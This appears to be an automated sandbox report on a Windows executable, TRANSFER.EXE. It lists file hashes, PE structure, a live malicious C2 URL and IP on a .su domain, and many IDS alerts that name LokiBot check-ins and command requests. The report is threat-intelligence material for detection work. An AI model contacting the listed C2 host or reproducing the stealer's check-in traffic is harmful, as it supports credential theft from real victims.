                • URL Reputation: safe
                unknown
                http://sempersim.su/gi4/fre.phptrue
                • 24%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.ibsensoftware.com/cmdkey.exe, cmdkey.exe, 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cmdkey.exe, 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                45.11.26.144
                sempersim.suRussian Federation
                9002RETN-ASEUtrue
                Joe Sandbox Version:35.0.0 Citrine
                Analysis ID:679099
                Start date and time: 05/08/202209:09:082022-08-05 09:09:08 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 57s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:TRANSFER.EXE
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.expl.evad.winEXE@3/3@34/1
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 97.9% (good quality ratio 93.9%)
                • Quality average: 76.9%
                • Quality standard deviation: 28.6%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .EXE
                • Adjust boot time
                • Enable AMSI
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • HTTP Packets have been reduced
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                09:10:41API Interceptor31x Sleep call for process: cmdkey.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Users\user\Desktop\TRANSFER.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):425
                Entropy (8bit):5.340009400190196
                Encrypted:false
                SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                MD5:CC144808DBAF00E03294347EADC8E779
                SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                Malicious:true
                Reputation:high, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                Process:C:\Windows\SysWOW64\cmdkey.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1
                Process:C:\Windows\SysWOW64\cmdkey.exe
                File Type:data
                Category:dropped
                Size (bytes):49
                Entropy (8bit):1.2701062923235522
                Encrypted:false
                SSDEEP:3:/l1PL3n:fPL3
                MD5:CD8FA61AD2906643348EEF98A988B873
                SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:........................................user.
                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):6.451347345976372
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:TRANSFER.EXE
                File size:1517568
                MD5:6153ed96a83ceea98dbae09e7b77fcf6
                SHA1:7f9a6ce71969ef0eb7deeafed635a127f23e37a8
                SHA256:08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e
                SHA512:189317086da1cad38db31b7a791a3a9c34dd551245e1ff4f74563429b17a33485e8ce5fff48e0cfef09d1034b2c7a953dfeeed75636d61ddaf110137a298a701
                SSDEEP:24576:fUKvdOVvLnRj8kp67n/N+fzUA23AwgTobYS:ZcbCDC63AwgTobYS
                TLSH:E7656CE87C2056B5DBE8D5799A53C6183328054CE5BCD4A239FB5C2CBCC93EB06D924E
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N.^.........."...0.....p........<... ...@....@.. ....................................`................................
                Icon Hash:00828e8e8686b000
                Entrypoint:0x573c12
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x5E064EA3 [Fri Dec 27 18:34:11 2019 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x173af80x4a.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1740000x564.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1760000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x173b420x1c.text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x171c180x171e00False0.44799565414836096data6.455507988515264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x1740000x5640x600False0.3450520833333333data3.1764311875173044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x1760000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RT_VERSION0x1740580x50cdataEnglishUnited States
                DLLImport
                mscoree.dll_CorExeMain
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.68.8.8.850958532014169 08/05/22-09:10:51.380843UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5095853192.168.2.68.8.8.8
                192.168.2.645.11.26.14449787802825766 08/05/22-09:10:58.658888TCP2825766ETPRO TROJAN LokiBot Checkin M24978780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449860802025381 08/05/22-09:12:05.554361TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449773802021641 08/05/22-09:10:51.481984TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449788802021641 08/05/22-09:11:01.711456TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449813802024313 08/05/22-09:11:38.357337TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449806802825766 08/05/22-09:11:25.288207TCP2825766ETPRO TROJAN LokiBot Checkin M24980680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449769802825766 08/05/22-09:10:41.114928TCP2825766ETPRO TROJAN LokiBot Checkin M24976980192.168.2.645.11.26.144
                192.168.2.645.11.26.14449772802825766 08/05/22-09:10:49.248779TCP2825766ETPRO TROJAN LokiBot Checkin M24977280192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498112025483 08/05/22-09:11:34.337182TCP2025483ET TROJAN LokiBot Fake 404 Response804981145.11.26.144192.168.2.6
                192.168.2.645.11.26.14449791802021641 08/05/22-09:11:04.815056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498132025483 08/05/22-09:11:39.718840TCP2025483ET TROJAN LokiBot Fake 404 Response804981345.11.26.144192.168.2.6
                192.168.2.645.11.26.14449813802024318 08/05/22-09:11:38.357337TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498082025483 08/05/22-09:11:31.149561TCP2025483ET TROJAN LokiBot Fake 404 Response804980845.11.26.144192.168.2.6
                192.168.2.68.8.8.851971532014169 08/05/22-09:10:38.737056UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5197153192.168.2.68.8.8.8
                192.168.2.645.11.26.14449823802024318 08/05/22-09:11:58.081188TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449860802825766 08/05/22-09:12:05.554361TCP2825766ETPRO TROJAN LokiBot Checkin M24986080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449846802024318 08/05/22-09:12:03.190477TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449772802025381 08/05/22-09:10:49.248779TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449832802025381 08/05/22-09:12:00.816507TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449876802021641 08/05/22-09:12:15.818317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449881802021641 08/05/22-09:12:22.599825TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.645.11.26.144
                192.168.2.68.8.8.849695532014169 08/05/22-09:10:53.761004UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4969553192.168.2.68.8.8.8
                192.168.2.645.11.26.14449814802025381 08/05/22-09:11:41.090702TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449795802025381 08/05/22-09:11:09.138567TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.645.11.26.144
                192.168.2.645.11.26.14449823802024313 08/05/22-09:11:58.081188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449846802024313 08/05/22-09:12:03.190477TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449797802025381 08/05/22-09:11:13.734140TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449883802025381 08/05/22-09:12:25.116712TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449768802021641 08/05/22-09:10:38.844396TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.645.11.26.144
                192.168.2.68.8.8.857037532014169 08/05/22-09:11:01.609616UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5703753192.168.2.68.8.8.8
                192.168.2.645.11.26.14449770802025381 08/05/22-09:10:43.512599TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449771802024313 08/05/22-09:10:46.236811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449818802024318 08/05/22-09:11:53.331696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449806802025381 08/05/22-09:11:25.288207TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449767802025381 08/05/22-09:10:33.531418TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449771802024318 08/05/22-09:10:46.236811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449818802024313 08/05/22-09:11:53.331696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498062025483 08/05/22-09:11:26.638697TCP2025483ET TROJAN LokiBot Fake 404 Response804980645.11.26.144192.168.2.6
                192.168.2.645.11.26.14449814802825766 08/05/22-09:11:41.090702TCP2825766ETPRO TROJAN LokiBot Checkin M24981480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449808802825766 08/05/22-09:11:29.964196TCP2825766ETPRO TROJAN LokiBot Checkin M24980880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449812802025381 08/05/22-09:11:35.695582TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449820802021641 08/05/22-09:11:55.767753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449811802825766 08/05/22-09:11:33.059063TCP2825766ETPRO TROJAN LokiBot Checkin M24981180192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498202025483 08/05/22-09:11:56.944314TCP2025483ET TROJAN LokiBot Fake 404 Response804982045.11.26.144192.168.2.6
                192.168.2.68.8.8.852328532014169 08/05/22-09:12:11.720590UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5232853192.168.2.68.8.8.8
                192.168.2.645.11.26.14449769802025381 08/05/22-09:10:41.114928TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.645.11.26.144
                192.168.2.645.11.26.14449775802025381 08/05/22-09:10:56.189285TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.645.11.26.144
                192.168.2.645.11.26.14449774802825766 08/05/22-09:10:53.861086TCP2825766ETPRO TROJAN LokiBot Checkin M24977480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449804802025381 08/05/22-09:11:20.056413TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449816802825766 08/05/22-09:11:45.230367TCP2825766ETPRO TROJAN LokiBot Checkin M24981680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449880802825766 08/05/22-09:12:19.118779TCP2825766ETPRO TROJAN LokiBot Checkin M24988080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449869802025381 08/05/22-09:12:11.819483TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497702025483 08/05/22-09:10:44.657387TCP2025483ET TROJAN LokiBot Fake 404 Response804977045.11.26.144192.168.2.6
                45.11.26.144192.168.2.680497722025483 08/05/22-09:10:50.403894TCP2025483ET TROJAN LokiBot Fake 404 Response804977245.11.26.144192.168.2.6
                192.168.2.645.11.26.14449788802024313 08/05/22-09:11:01.711456TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449880802024313 08/05/22-09:12:19.118779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449774802025381 08/05/22-09:10:53.861086TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.645.11.26.144
                192.168.2.645.11.26.14449799802825766 08/05/22-09:11:17.792361TCP2825766ETPRO TROJAN LokiBot Checkin M24979980192.168.2.645.11.26.144
                192.168.2.68.8.8.852125532014169 08/05/22-09:11:32.959912UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5212553192.168.2.68.8.8.8
                192.168.2.645.11.26.14449880802024318 08/05/22-09:12:19.118779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449770802021641 08/05/22-09:10:43.512599TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449812802825766 08/05/22-09:11:35.695582TCP2825766ETPRO TROJAN LokiBot Checkin M24981280192.168.2.645.11.26.144
                192.168.2.68.8.8.864579532014169 08/05/22-09:12:00.716740UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6457953192.168.2.68.8.8.8
                192.168.2.645.11.26.14449797802024318 08/05/22-09:11:13.734140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449791802024318 08/05/22-09:11:04.815056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449797802024313 08/05/22-09:11:13.734140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449767802021641 08/05/22-09:10:33.531418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449788802024318 08/05/22-09:11:01.711456TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.645.11.26.144
                192.168.2.645.11.26.14449846802825766 08/05/22-09:12:03.190477TCP2825766ETPRO TROJAN LokiBot Checkin M24984680192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497752025483 08/05/22-09:10:57.419937TCP2025483ET TROJAN LokiBot Fake 404 Response804977545.11.26.144192.168.2.6
                192.168.2.645.11.26.14449791802024313 08/05/22-09:11:04.815056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449799802025381 08/05/22-09:11:17.792361TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498322025483 08/05/22-09:12:02.125452TCP2025483ET TROJAN LokiBot Fake 404 Response804983245.11.26.144192.168.2.6
                192.168.2.645.11.26.14449769802024313 08/05/22-09:10:41.114928TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.645.11.26.144
                192.168.2.68.8.8.864150532014169 08/05/22-09:12:05.451836UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6415053192.168.2.68.8.8.8
                45.11.26.144192.168.2.680498232025483 08/05/22-09:11:59.337044TCP2025483ET TROJAN LokiBot Fake 404 Response804982345.11.26.144192.168.2.6
                192.168.2.68.8.8.861901532014169 08/05/22-09:11:17.691645UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6190153192.168.2.68.8.8.8
                192.168.2.68.8.8.859724532014169 08/05/22-09:11:45.132770UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5972453192.168.2.68.8.8.8
                192.168.2.68.8.8.851645532014169 08/05/22-09:12:25.018082UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5164553192.168.2.68.8.8.8
                192.168.2.645.11.26.14449811802024318 08/05/22-09:11:33.059063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.645.11.26.144
                192.168.2.645.11.26.14449812802021641 08/05/22-09:11:35.695582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449811802024313 08/05/22-09:11:33.059063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.645.11.26.144
                192.168.2.68.8.8.865367532014169 08/05/22-09:11:57.984866UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6536753192.168.2.68.8.8.8
                192.168.2.645.11.26.14449846802021641 08/05/22-09:12:03.190477TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449769802024318 08/05/22-09:10:41.114928TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498762025483 08/05/22-09:12:16.875250TCP2025483ET TROJAN LokiBot Fake 404 Response804987645.11.26.144192.168.2.6
                192.168.2.645.11.26.14449818802825766 08/05/22-09:11:53.331696TCP2825766ETPRO TROJAN LokiBot Checkin M24981880192.168.2.645.11.26.144
                192.168.2.68.8.8.860658532014169 08/05/22-09:11:55.669298UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6065853192.168.2.68.8.8.8
                192.168.2.645.11.26.14449813802025381 08/05/22-09:11:38.357337TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449770802825766 08/05/22-09:10:43.512599TCP2825766ETPRO TROJAN LokiBot Checkin M24977080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449795802825766 08/05/22-09:11:09.138567TCP2825766ETPRO TROJAN LokiBot Checkin M24979580192.168.2.645.11.26.144
                45.11.26.144192.168.2.680497692025483 08/05/22-09:10:42.315303TCP2025483ET TROJAN LokiBot Fake 404 Response804976945.11.26.144192.168.2.6
                45.11.26.144192.168.2.680498182025483 08/05/22-09:11:54.547531TCP2025483ET TROJAN LokiBot Fake 404 Response804981845.11.26.144192.168.2.6
                192.168.2.68.8.8.858723532014169 08/05/22-09:10:33.085999UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5872353192.168.2.68.8.8.8
                192.168.2.645.11.26.14449818802021641 08/05/22-09:11:53.331696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.645.11.26.144
                45.11.26.144192.168.2.680498042025483 08/05/22-09:11:21.507119TCP2025483ET TROJAN LokiBot Fake 404 Response804980445.11.26.144192.168.2.6
                192.168.2.645.11.26.14449820802024318 08/05/22-09:11:55.767753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.645.11.26.144
                192.168.2.645.11.26.14449869802825766 08/05/22-09:12:11.819483TCP2825766ETPRO TROJAN LokiBot Checkin M24986980192.168.2.645.11.26.144
                192.168.2.645.11.26.14449876802025381 08/05/22-09:12:15.818317TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449795802021641 08/05/22-09:11:09.138567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.645.11.26.144
                192.168.2.645.11.26.14449787802025381 08/05/22-09:10:58.658888TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449881802825766 08/05/22-09:12:22.599825TCP2825766ETPRO TROJAN LokiBot Checkin M24988180192.168.2.645.11.26.144
                192.168.2.68.8.8.863844532014169 08/05/22-09:12:19.016791UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6384453192.168.2.68.8.8.8
                192.168.2.68.8.8.858360532014169 08/05/22-09:11:40.989769UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5836053192.168.2.68.8.8.8
                192.168.2.645.11.26.14449808802024313 08/05/22-09:11:29.964196TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.645.11.26.144
                192.168.2.68.8.8.863104532014169 08/05/22-09:11:35.598325UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6310453192.168.2.68.8.8.8
                192.168.2.645.11.26.14449772802024318 08/05/22-09:10:49.248779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.645.11.26.144
                192.168.2.645.11.26.14449773802825766 08/05/22-09:10:51.481984TCP2825766ETPRO TROJAN LokiBot Checkin M24977380192.168.2.645.11.26.144
                192.168.2.645.11.26.14449816802025381 08/05/22-09:11:45.230367TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.645.11.26.144
                192.168.2.645.11.26.14449767802825766 08/05/22-09:10:33.531418TCP2825766ETPRO TROJAN LokiBot Checkin M24976780192.168.2.645.11.26.144
                192.168.2.645.11.26.14449814802024318 08/05/22-09:11:41.090702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.645.11.26.144
